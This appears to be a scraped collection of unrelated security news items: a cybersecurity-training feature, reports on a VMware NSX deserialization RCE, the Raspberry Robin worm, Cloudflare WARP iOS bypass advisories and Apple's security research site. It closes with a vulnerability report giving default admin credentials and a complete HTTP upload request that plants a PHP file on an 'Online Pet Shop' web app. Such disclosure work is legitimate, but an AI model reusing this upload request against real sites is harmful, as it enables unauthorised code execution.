Categories: News
Tags: week in security

Tags:  weekly blog roundup

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 24 - 30) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 24 - 30)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 21 and Oct. 28. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for October 21 to October 28

The next generation of cybersecurity pros will need to participate frequently in relevant training to expand their skills and stay engaged.

The shortage of cybersecurity professionals worldwide is a growing concern for organizations of all sizes, as threats mount and attack vectors become more difficult to defend against.

CyberSeek.org counts nearly 770,000 open jobs in cybersecurity, and the data is showing that employer demand for cybersecurity workers is growing 2.4 times faster than the overall rate across the US economy.

To adequately train the next generation of cybersecurity pros, organizations need to start thinking more collaboratively, using virtual technologies as learning tools, and turning to upskilling to offer opportunities to in-house talent.

**Teaching the Why Along With the How**

Some of the changes in training and education approaches are fundamental, argues Andrew Hay, COO at Lares Consulting, an information security consulting firm.

"We often teach people the 'how' but never the 'why' when it comes to cybersecurity training," he says. "For example, we'll show someone how to run a tool to detect a vulnerability, but we won't educate them on why the vulnerability surfaced in the first place."

He says if you don't show people how to prevent vulnerabilities from occurring, you're doomed to keep showing them how to detect them after the fact.

"We have an entire team dedicated to showing our customers how to detect, mitigate, and prevent attacks within their organization," he says. "Not only do we show effect, but we also show cause." Hay says by training people to prevent insecure configurations in the first place, you can help them reduce their attackable surface area.

He adds that cyber-range and capture-the-flag (CTF) events are fantastic learning environments to hone your skills and grow as a cybersecurity professional.

"You'll get to experience how others think about attacking a system, what tools and techniques they use, and their thought process," Hay says. "It's invaluable."

**Playing NICE**

Danielle Santos, manager of communications and operations for NIST'S National Initiative for Cybersecurity Education (NICE), says investing in cybersecurity training and education now is critical to meet this growing demand.

"We are coordinating with government, academic, and industry partners to build on existing successful programs, facilitate change and innovation, and bring leadership and vision to increase the number of skilled cybersecurity professionals," she explains. By facilitating a mechanism whereby the educators, trainers, and employers can come together as a community, they are better positioned to have training that meets the workforce demand.

NICE is also responsible for maintaining the Workforce Framework for Cybersecurity, which describes tasks, knowledge, and skills that are needed to perform cybersecurity work. It provides a standard for training and certification providers to establish knowledge and skill requirements according to tasks in the workplace.

**Smashing Training Silos**

Mika Aalto, co-founder and CEO at Hoxhunt, a Helsinki-based provider of enterprise security awareness solutions, says that the motivation for training today is compliance-driven, not security-driven, which leads to training implementations that can't address human cybersecurity risk.

He argues that organizations should take a risk-based view of the actual attacks employees face and focus on building the right culture and driving the adoption of the correct habits.

"When it comes to the core sins, organizations are running punitive programs that fail to capture employees' hearts and minds," he says.

Making matters worse, training frequency is occasional, and curriculum is built with a one-size-fits-all mentality. "Today's technology allows us to automatically develop and deliver individual training experiences at scale, driving behavior change rather than raising awareness," he says.

From Aalto's perspective, another core sin is that the training often gets siloed. "Awareness professionals are blind to the attacks and metrics managed by security operations," he says. "They lack the cohesive processes and technology to share intelligence and augment detection and response capabilities."

He says that modern teams should work in harmony, with effective training platforms that enable employees to hunt attacks that have infiltrated the organization and integrate that data into operations to mitigate the threats in real time.

"Extending awareness into the center of the security stack is a game-changer in how training is conducted and leveraged," he adds.

**Innovations in Training**

Santos notes that over the past several years, simulated training has shown promise as a mechanism to learn new cybersecurity skills. Training offered through cyber ranges, for example, allows learners to experience simulated real-world scenarios and demonstrate applied knowledge and skills.

"Additionally, apprenticeships, while not new to the broader workforce, but relatively new as they apply to the cybersecurity workforce, is a proven approach to expanding cybersecurity talent," she says.

She highlights the US Departments of Commerce and Labor's recent partnership on a 120-day Cybersecurity Apprenticeship Sprint to promote the Registered Apprenticeship model as a way to develop and train a skilled and diverse cybersecurity workforce.

**Moving to New Training Models**

Kelly Albrink, Bishop Fox practice director for application security, points out that cybersecurity training has historically culminated in a multiple-choice test that relies on memorization.

"With the Internet at our fingertips, memorization is far less important than problem solving," she explains. "So, training should be more focused on hands-on exercises that directly map to what real cybersecurity work looks like."

She mentions her company's Bishop Fox Academy, an internal training program to help people gain both technical skills and soft skills. "Bishop Fox is one of the few companies with actual entry-level roles for junior consultants," Albrink says. "We have a formal mentor program that matches consultants based on their interests and specializations."

She says that in earlier iterations of the mentor program, the company received a lot of feedback from both mentors and mentees that they wanted more structure and guidance on how to get the most out of the program, which led to the creation of a worksheet to help guide initial conversations. It included both "getting to know you" questions to help pairs build an immediate connection, as well as guidance on goal setting.

"We also understand that not every mentor match is the best fit so, 2-3 times a year we give people the opportunity to get a new match or extend their current pairing," she adds. "I typically encourage people to have multiple mentors and receive mentoring on more than one topic."

**The Benefits of Upskilling**

"When you upskill existing cybersecurity, staff you can cut down the learning curve within your organization and often fill gaps faster," Ron Culler, vice president cyber learning officer at CompTIA, explains.

However, it's not just existing cybersecurity staff that should be the focus — he says organizations should be looking across their workforce and at all its IT staff. "Many of these individuals have strong foundational knowledge of the organization," he says. "They can be some of the best candidates to work in cybersecurity, simply because cybersecurity encompasses all aspects of an organization."

Santos agrees that upskilling is an effective approach to filling talent gaps more quickly in an organization. "It utilizes the existing workforce, many of whom have transferrable skills that can be applied to a cybersecurity," she says.

**Cybersecurity Touches All Aspects of an Organization**

CompTIA offers education, training, and certification options for individuals interested in working in cybersecurity and those already in the profession. Four certifications are specific to cybersecurity skills at different career levels — entry, mid, and advanced. Cybersecurity is also embedded in the company's other certifications in networking, data, cloud computing, and other disciplines.

Culler points out that traditional approaches have often focused on individuals with a heavy background in technology.

"While this is still needed, cybersecurity encompasses much more than just tech," he says. "Diverse experiences and skills are needed to fill gaps in cybersecurity roles throughout organizations."

As he puts it, cybersecurity is not a technology issue, but rather something that touches every aspect of an organization.

**Training the Next Generation of Hackers**

From Albrink's perspective, you can't buy enough senior talent to meet the demands of the market. The only viable solution is to train the next generation of hackers.

"In terms of best practices, newcomers often want to learn everything and get overwhelmed," she says. "If they pick two focuses, and those two things synergize well, they'll be much better set up for success."

She adds that learning in a vacuum, like simply reading a book or watching a video, doesn't lead to good results. "I always recommend that you pick a hands-on project to apply what you're trying to learn," she says. "For example, every webapp hacker should build and deploy their own app."

She says that gives you a much better perspective on how difficult it can be to put common defensive recommendations into practice and helps you to better understand the struggles that developers face.

**More Flexibility, More Investment**

Albrink says she's seen a trend of publicly available training moving to a more on-demand subscription-based model. "This gives learners the flexibility to fit their training schedule to their busy lives," she says. "So, instead of trying to knock out a red team lab in 30, 60, or 90 days, they get access for a year."

The downside is the training has become a lot more expensive and out of reach for most people paying for it themselves.

Santos explains the US Department of Commerce supports a workforce development model, to include training, that leans on an employer-driven regional approach. "An employer-driven approach aims to ensure that the supply of cybersecurity talent is job-ready," she says.

Culler agrees it's important to invest in cybersecurity training now because cybersecurity threats aren't going away or lessening. "We need a cyber aware and cyberskilled workforce for organizations to remain competitive and thrive in the current environment and into the future," he says.

From Aalto's perspective, the key word is "invest." He points out that around 90% of breaches contain a human element, almost always initiated by a phishing attack, and yet only 3% of security budgets go to awareness.

"That imbalance tilts the advantage towards the threat actors, whose attacks get more relentless and sophisticated by the day," he says.

In a risk landscape where cybersecurity is increasingly expensive and hard to get, and where regulations tighten all the time, it's up to organizations to take a risk-based approach to protect themselves where they're most vulnerable — their people.

"It works, if your training is done right," Aalto says.

Wanted: Cybersecurity Training That Breaks Down Silos

Bug fixed despite product reaching end of life

Bug fixed despite product reaching end of life

  

VMWare has patched a critical vulnerability in the management service for NSX, its network virtualization and security platform.

The vulnerability, caused by an old deserialization bug in an outdated Java library, could be abused to achieve pre-authentication remote code execution (RCE) on the host computer.

Due to the bug’s criticality, VMWare issued a patch despite the product having reached end-of-life status. The vulnerability is a reminder of the security challenges of managing open source software dependencies.

**Deserialization bugs**

Discovered and documented by security researcher Sina Kheirkhah, the main culprit in the VMWare NSX Manager flaw was XStream, a library for converting Java objects to XML format and vice versa (aka marshalling/unmarshalling).

XStream supports the marshalling and unmarshalling of a wide range of Java objects, even those that don’t support the Serializable interface.

This has made XStream an attractive launchpad for various code injection attacks. Security researcher Alvaro Muñoz documented RCE attacks with XStream in 2013, research that greatly helped Kheirkhah in discovering the VMWare vulnerability.

To go from unmarshalling to code execution on the host machine, the attacker would have to hook several Java features including dynamic proxies, event handlers, and method closure. This allowed the attacker to instantiate the class and invoke the method that runs commands on the system.

**Exploit on VMWare NSX Manager**

Versions of XStream up to 1.4.18 are vulnerable to this kind of deserialization attack. Kheirkhah discovered that VMWare NSX Manager used v1.4.18. The next step was to find an endpoint that could allow him to exploit the vulnerability.

“Java is very wild and there are so many scenarios that something can go wrong and end up in RCE on a popular appliance/software,” Kheirkhah told The Daily Swig. “I spent weeks studying how this certain VMWare product works which, eventually after spending so much time, it led to me to the discovery of the vulnerability.”

Kheirkhah first found an endpoint through which he could exploit the bug on NSX Manager. However, this endpoint required authenticated access.

With the help of security researcher Steven Seeley, Kheirkhah was able to access XStream through the password reset endpoint, which led to pre-authentication RCE on the NSX Manager host.

“This vulnerability allowed unauthenticated remote code execution as the root user on the target VMWare product,” Kheirkhah said.

Kheirkhah posted a proof of concept that shows how an attacker could gain shell access to the NSX Manager server.

**Lessons learned**

Even though the product had reached its end of life, VMWare patched it because it evaluated the severity of the bug to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

“While VMware does not mention end-of-life products on VMware Security Advisories, due to the critical severity of NSX-V the product team has made a patch available,” VMWare stated in an advisory.

“Deserialization vulnerabilities have been around for many years and will never go away,” Kheirkhah said.

“Even today you can notice how many new serialization libraries are getting introduced every day and how talented researchers are analyzing the security of these libraries and how it’s possible to abuse the deserialization process.”

Kheirkhah also underlined the importance of carefully handling the dependency chain of open source software. “Keeping track of dependencies and making sure they’re up to date is vital for securing your software,” he stressed.

The Daily Swig has reached out to VMWare for comments. We will update this post if we hear back from them.

YOU MAY ALSO LIKE Jira Align flaws enabled malicious users to gain super admin privileges – and potentially worse

VMWare patches RCE exploit in NSX Manager

The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware.
It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC

The **Raspberry Robin** worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware.

It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC) said in a detailed write-up.

Raspberry Robin, also called QNAP Worm owing to the use of compromised QNAP storage servers for command-and-control, is the name given to a malware by cybersecurity company Red Canary that spreads to Windows systems through infected USB drives.

MSTIC is keeping tabs on the activity group behind the USB-based Raspberry Robin infections as **DEV-0856**, adding it's aware of at least four confirmed entry points that all have the likely end goal of deploying ransomware.

The tech giant's cybersecurity team said that Raspberry Robin has evolved from a widely distributed worm with no observed post-infection actions to one of the largest malware distribution platforms currently active.

According to telemetry data collected from Microsoft Defender for Endpoint, roughly 3,000 devices spanning nearly 1,000 organizations have encountered at least one Raspberry Robin payload-related alert in the last 30 days.

The latest development adds to growing evidence of post-exploitation activities linked to Raspberry Robin, which, in July 2022, was discovered acting as a conduit to deliver the FakeUpdates (aka SocGholish) malware.

This FakeUpdates activity has also been followed by pre-ransomware behavior attributed to a threat cluster tracked by Microsoft as DEV-0243 (aka Evil Corp), the infamous Russian cybercrime syndicate behind the Dridex trojan and a command-and-control (C2) framework called TeslaGun.

Microsoft, in October 2022, said it detected Raspberry Robin being used in post-compromise activity attributed to a different threat actor it has codenamed DEV-0950 and which overlaps with groups monitored publicly as FIN11 and TA505.

While the names FIN11 and TA505 have often been used interchangeably, Google-owned Mandiant (formerly FireEye) describes FIN11 as a subset of activity under the TA505 group.

It's also worth pointing out the conflation of Evil Corp and TA505, although Proofpoint assesses "TA505 to be different than Evil Corp," suggesting that these clusters share partial tactical commonalities with one another.

"From a Raspberry Robin infection, the DEV-0950 activity led to Cobalt Strike hands-on-keyboard compromises, sometimes with a Truebot infection observed in between the Raspberry Robin and Cobalt Strike stage," the researcher said. "The activity culminated in deployments of the Clop ransomware."

Microsoft also theorized that the actors behind these Raspberry Robin-related malware campaigns are paying the worm's operators for payload delivery, enabling them to move away from phishing as a vector to acquire new victims.

What's more, a cybercriminal actor dubbed DEV-0651 has been linked to the distribution of another artifact called Fauppod through the abuse of legitimate cloud services, which exhibits code similarities to Raspberry Robin and also drops the FakeUpdates malware.

The Windows maker further noted wih medium confidence that Fauppod represents the earliest known link in the Raspberry Robin infection chain for propagating the latter via LNK files to USB drives.

To add to the attack puzzle, IBM Security X-Force, early last month, identified functional similarities between a loader component used in the Raspberry Robin infection chain and the Dridex malware. Microsoft is attributing this code-level connection to Fauppod adopting Dridex's methods to avoid execution in specific environments.

"Raspberry Robin's infection chain is a confusing and complicated map of multiple infection points that can lead to many different outcomes, even in scenarios where two hosts are infected simultaneously," Microsoft said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints 

Lock Warp switch is a feature of Zero Trust platform which, when enabled, prevents users of enrolled devices from disabling WARP client. Due to insufficient policy verification by WARP iOS client, this feature could be bypassed by using the "Disable WARP" quick action.

**Package**

Cloudflare WARP mobile client (iOS)

**Description**

**Impact**

Lock Warp switch is a feature of Zero Trust platform which, when enabled, prevents users of enrolled devices from disabling WARP client. Due to insufficient policy verification by WARP iOS client, this feature could be bypassed by using the "Disable WARP" quick action.

**Patches**

The issue affected WARP client mobile application on iOS and was fixed in version 6.14.

**References**

*   Cloudflare WARP for iOS

CVE-2022-3322: Lock WARP switch bypass on WARP mobile client using iOS quick action

It was possible to bypass Lock WARP switch feature https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch on the WARP iOS mobile client by enabling both "Disable for cellular networks" and "Disable for Wi-Fi networks" switches at once in the application settings. Such configuration caused the WARP client to disconnect and allowed the user to bypass restrictions and policies enforced by the Zero Trust platform.

CVE-2022-3321

It was possible for a user to delete a VPN profile from WARP mobile client on iOS platform despite the Lock WARP switch https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/warp-settings/#lock-warp-switch feature being enabled on Zero Trust Platform. This led to bypassing policies and restrictions enforced for enrolled devices by the Zero Trust platform.

**Package**

Cloudflare WARP mobile client (iOS)

**Description**

**Impact**

It was possible for a user to delete a VPN profile from WARP mobile client on iOS platform despite the Lock WARP switch feature being enabled on Zero Trust Platform. This led to bypassing policies and restrictions enforced for enrolled devices by the Zero Trust platform.

**Patches**

The issue was fixed in Warp iOS mobile client v. 6.15.

**References**

*   Cloudflare WARP for iOS

CVE-2022-3337: Lock WARP switch bypass by removing VPN profile on iOS mobile client

Apple engineers share technical details about the team's work on memory safety features on the new Apple Security Research site.

Apple's work on hardening the memory allocator has made it harder for attackers to exploit certain classes of software vulnerabilities on iOS and Mac devices, the company's security engineers wrote on a new website Apple launched to share technical details behind iOS and MacOS security technologies.

The new initiative, Apple Security Research, also offers tools to help security researchers report issues to Apple, get real-time status updates for submitted reports, communicate securely with Apple engineers investigating the issue, and provides information about the Apple Security Bounty program. The intent behind the new security hub is to share with the research community how Apple engineers approach security challenges, and also to invite researcher contributions and feedback.

Memory safety is a key area of focus, especially since memory safety violations are the most widely exploited class of software vulnerabilities. On Apple platforms, improving memory safety includes "finding and fixing vulnerabilities, developing with safe languages, and deploying mitigations at scale," the engineers wrote in a technical post on XNU memory safety.

XNU is the kernel at the core of iPhones, iPads, and Macs.

Much of the code running on the iPhone, iPad, and Mac were written using "memory-unsafe" programming languages, which means they don’t prevent memory safety violations and developers can inadvertently and unknowingly violate memory safety rules while writing code, the researchers wrote. Those issues can be exploited by attackers to crash software, execute unauthorized command, and harvest sensitive information.

It is infeasible to rewrite large amounts of existing code using memory-safe languages, so "improving memory safety is an important objective for engineering teams across the industry,” the engineers wrote.

Apple laid the groundwork for the hardened memory allocator _kalloc\_type_ back in iOS 14 when it introduced _kheaps_, the data split, and virtual memory sequestering. Apple added randomized bucketed type isolation to the zone allocator when it introduced _kalloc\_type_ in iOS 15. With the release of iOS 16 and macOS Ventura, the hardened allocator is now available on all the systems using the XNU kernel.

"Our fundamental strategy is to design an allocator that makes exploiting most memory corruption vulnerabilities inherently unreliable," the researchers wrote. "This limits the impact of many memory safety bugs even before we learn about them, which improves security for all users."

In Apple's update on its bounty program, the company said it has awarded close to $20 million to security researchers over the past two-and-a-half years since the program was launched. While average payouts are around $40,000 in the product category, the company has paid 20 separate rewards over $100,000 for high-impact issues. Evaluation criteria researchers need to meet in order to collect bounties are available on Apple Security Research.

Apple Launches New Security Research Hub

Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the Product List module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.

**Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: z1pwn

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

Vulnerability url: http://ip/pet\_shop/classes/Master.php?f=save\_product

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the editing function of the product list module in the background management system

Request package for file upload：

POST /pet\_shop/classes/Master.php?f\=save\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/pet\_shop/admin/?page=product/manage\_product&id=6
Content-Length: 2685
Content-Type: multipart/form-data; boundary=---------------------------162223033527413
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
\-----------------------------162223033527413
Content-Disposition: form-data; name="id"
6
\-----------------------------162223033527413
Content-Disposition: form-data; name="category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="sub\_category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="product\_name"
Dog Belt
\-----------------------------162223033527413
Content-Disposition: form-data; name="description"
<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas dui nulla, tincidunt in arcu at, vulputate volutpat velit. Quisque volutpat gravida erat, gravida porttitor magna malesuada sed. Curabitur massa est, ullamcorper a diam vitae, tincidunt sagittis justo. Nam eu orci ligula. Duis ullamcorper dui at nisi consequat, sed suscipit sapien lacinia. Praesent ut lacus id arcu bibendum egestas. Cras ullamcorper dictum mi, non commodo mauris iaculis a. Pellentesque porta sem id dapibus tincidunt. Aenean metus tellus, efficitur ut feugiat in, euismod et arcu. In pharetra, dolor in fermentum facilisis, metus urna lacinia metus, in maximus justo tellus et tortor. Nam pulvinar eu enim auctor pellentesque.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Nam ut quam velit. Suspendisse commodo non urna nec dictum. Pellentesque eget enim id velit bibendum auctor vel id lectus. Maecenas dolor nibh, ultricies eget metus vel, efficitur varius tellus. Donec semper eros sit amet urna bibendum scelerisque. Interdum et malesuada fames ac ante ipsum primis in faucibus. Integer cursus est in sapien sodales, quis pulvinar nisl aliquet. Pellentesque blandit diam lobortis pulvinar ornare. Sed venenatis imperdiet massa, ut mollis sapien sagittis a. Nulla dignissim ultrices metus a mattis. Nunc egestas mattis nisl at posuere. Donec malesuada ut justo sed aliquam. Sed venenatis sit amet tortor et semper. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Vivamus sit amet massa at massa malesuada volutpat quis nec libero.</p>
\-----------------------------162223033527413
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
\-----------------------------162223033527413
Content-Disposition: form-data; name="status"
1
\-----------------------------162223033527413
Content-Disposition: form-data; name="img\[\]"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------162223033527413--

The files will be uploaded to this directory \\pet\_shop\\uploads\\product\_6 

We visited the directory of the file in the browser and found that the code had been executed

Tag

#ios